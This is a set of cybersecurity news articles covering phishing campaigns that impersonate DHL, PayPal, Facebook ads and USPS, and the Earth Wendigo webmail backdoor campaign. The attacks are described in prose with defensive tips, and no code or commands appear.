A separate campaign impersonated German international courier DHL Express, with emails telling recipients that “Your parcel has arrived,” with their email addresses towards the end of the title. The email told recipients that a package couldn't be conveyed to them because of incorrect delivery details – and that the parcel is rather ready for pickup at the post office. The email provoked recipients to look at appended “shipping documents” if they want to receive their delivery. The attached document was an HTML file (named “SHIPPING DOC”) that, when opened, previewed a spreadsheet that looked like shipping documents.

Hacking Group Earth Wendigo Exploits Emails via Spear-phishing Attacks


As per the cybersecurity experts, the cyberattacks are related to Earth Wendigo, a cyber criminal currently not linked to any of the hacking groups. At the start of May 2019, Trend Micro reported that multiple organizations were attacked by Earth Wendigo. The targets include research institutions, government organizations and universities. The cyberattack used spear-phishing mails to exploit its victims, which include activists and politicians based in Hong Kong, Tibet and Uyghur region. 

Trend Micro reports, "we discovered a new campaign that has been targeting several organizations — including government organizations, research institutions and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely-used in Taiwan. With no clear connection to any previous attack group, we gave this new threat actor the name “Earth Wendigo.” 

Earth Wendigo deployed spear-phishing emails that contained obfuscate Java script code, using initial attack vectors, Java script loaded corrupted scripts from remote servers controlled by attackers. The scripts were built for stealing Webmail session keys and browser cookies, spread the malicious scripts through appending code with the target's email signature, and exploiting an XSS (cross-site scripting) vulnerability in the Javascript injection Webmail server. "The Earth Wendigo threat actor will establish a WebSocket connection between the victims and their WebSocket server via a JavaScript backdoor. The WebSocket server instructs the backdoor on the victim’s browser to read emails from the webmail server and then send the content and attachments of the emails back to the WebSocket servers," says Trend Micro. 

The XSS vulnerability exploit exists in system shortcut feature of webmail, which allows the threat actor to put craft payload shortcut that replaces webmail system page's parts by corrupted JavaScript codes. "Additional investigation shows that the threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong. However, this is a separate series of attacks from their operation in Taiwan, which this report covers," reports Trend Micro.

PayPal Phishing Scam 2021, Here's How to Stay Guarded

 


Another PayPal phishing campaign attempts to take account logins and other personal data. Noxious individuals are sending clients instant messages warning them that their accounts are permanently "limited" and urging them to sign in and verify their identity and account via a given link. Just as it is run of the mill with PayPal phishing messages, this trick likewise incorporates all the vital parts to deceive clients – a short claim that threatens with the outcome and a phony link that diverts clients to a caricaturing site. 

Cybercriminals abuse clients' inexperience and lack of experience by employing infamous social engineering techniques. They create emails or messages that resemble those from real organizations, which persuades victims to give away their details readily. 

The given hyperlink in the new PayPal phishing campaign diverts telephone clients to a spoofing webpage that appears to be indistinguishable from that of PayPal, however, the web address is observably different. Also, prospective victims are quickly approached to sign in to their accounts. Along these lines, they are diverted to a page where a couple of clarifications on why their accounts have been limited are shown, and they are encouraged to secure their accounts. At that point, PayPal clients see another page where they are approached to give their data, such as complete name, date of birth, and billing address. When clients fill in these details, every one of them is then shipped off to the operators behind the scam. They could utilize them to abuse users' PayPal account, open new bank accounts, or utilize the individual's data for future phishing campaigns. 

On the off chance that you've been fooled into filling these fields, at that point the following steps should be taken to avoid becoming a cyber victim: 

 • Sign in to your PayPal account and change the password right away. 

 • On the off chance that a similar password is utilized for signing in to some other accounts, visit them and change it also. 

 • Inform PayPal regarding such a scam and that you might have got influenced. 

 • To ensure no false accounts are made in your name – issue a temporary freeze on your credit report.

To ensure safe, stay wary of such malicious links and stick to the terms and conditions of the organization. Additionally, please note that PayPal could never send its clients any instant messages or force them to visit and sign in to their system immediately, only cybercriminals operate that way. The organization just sends emails that incorporate such data, and it generally contains a clarification for the constraint.

6.15 Lakh Facebook Users' Account Compromised by Facebook Ad Phishing Campaign

 



A large scale ad phishing campaign that has compromised more than 6.15 lakh Facebook users' account was exposed by cybersecurity researchers. This ad phishing campaign is spread in at least 50 countries and reportedly the accounts are being compromised by exploiting the pages of open source repository GitHub. 
 
ThreatNix which is a Nepal-based security firm, while giving insights into the attack, said that the number of affected users is rapidly increasing, at an unusual pace of over 100 entries per minute and the situation is expected to worsen furthermore if necessary steps are not taken in due time.  
 
The researchers noted, "the phishing campaign by a sponsored Facebook post that was offering 3GB mobile data from Nepal Telecom and was redirecting to a phishing site hosted on GitHub page; the attackers created different pages imitating the legit pages from numerous entities. The attackers were using the profile picture and name of Nepal Telecom". 
 
Additionally, the cybersecurity firm claimed in a statement this week, “similar Facebook posts were used to target the Facebook users from Pakistan, Tunisia, Norway, Malaysia, Philippines, and Norway”. As per the findings of the firm, this ad phishing campaign is using localized Facebook posts and sending links inside these Facebook posts which redirected to a static GitHub page website that contained a login panel for Facebook. 
 
The cybersecurity researchers also noted that “after redirecting to a static GitHub page it forwarded the phished credentials to two endpoints one to a Firestore database and another to a domain which was owned by the phishing group”. The researchers also unearthed that nearly 500 GitHub repositories containing phishing pages are part of the identical phishing campaign. 
 
According to cybersecurity firm ThreatNix, they are working in unison with other authorities to “bring down the phishing infrastructure by reserving the information related to the domain”. The attackers were using Bitly link’s which pointed towards a benign page and when the Facebook ad was approved it was getting converted to point to the phishing domain, they used Bitly’s link because now Facebook takes all necessary steps to ensure that such phishing pages are not approved for ads.

Credential Phishing Attack Impersonating USPS Targets Consumers Over the Holidays

 

As the year is coming to a wrap, the 2020 holiday season is being actively attacked by malicious actors.  In recent months, a steady upsurge has been witnessed in cybercrime related to online shopping as people have increasingly shopped online this year. Security experts have predicted a further spike in cyber scams during the holiday season, especially throughout the month of December. 

On Wednesday, Abnormal Security Corporation disclosed that its email security platform has blocked a credential phishing attack that was imitating the U.S. postal service for victims’ credit card credentials. The attack was pursuing recipients for special delivery charges so they can get their delivery within three days. 

Companies reported that peoples are approaching fast order delivery and online orders are continuing to pour in, because of this, courier services are facing more pressure from consumers. It's mainly due to the pandemic that online shipping demand has increased and the rise in online shipping is turning out to be vicious for inexperienced customers of USPS, Amazon, FedEx, and UPS. In a related blog post, Abnormal Security said that the hackers were taking advantage of those customers who were looking for fast delivery over the holidays. 

Recent research by CheckPoint revealed that shipping-related phishing emails have increased 440 percent in November 2020, in comparison to the previous month of October. Furthermore, more phishing scams are being anticipated this holiday season. 

Abnormal Security Platform said on its blog post that they managed to block the attacker before it could hack 15,000 to 50,000 mailboxes of the customers. 

According to intelligence, this attack itself imitates delivery notification emails from the USPS, notifying delivery payment confirmation to the customers that their parcel cannot be delivered until their payment gets confirmed. Although the platform has been hacked, emails were appeared as originating from real US postal service as it was using all official features of the US Postal Service. The email carried some link that leads the customer to a fake USPS tracking site asking for special shipping charges for their fast delivery; this page was ultimately leading recipients to share their credit card information. 

Hank Schless, Senior Manager, Security Solutions at Lookout said, "an attack like this can be even more effective if the target accesses it from a mobile device. It’s harder to spot a phishing attack on mobile than it is on a desktop. Since mobile devices have smaller screens and a simplified user experience, people are less inclined to verify the sender’s real email address or identity. In this particular case, if the targeted individual doesn’t know how to preview a link on mobile, they are at higher risk of falling for the scam."

As suggested by Jamie Hart, Cyber Threat Intelligence Analyst at Digital Shadows, users and security teams can follow the steps mentioned below to ensure the prevention of phishing attacks. 

• Install antivirus software 
• Frequently update all the systems which include the latest security patches and updates 
• Use a web filter that blocks suspected websites 
• Offer more often security training that includes when and where users should report suspected phishing emails.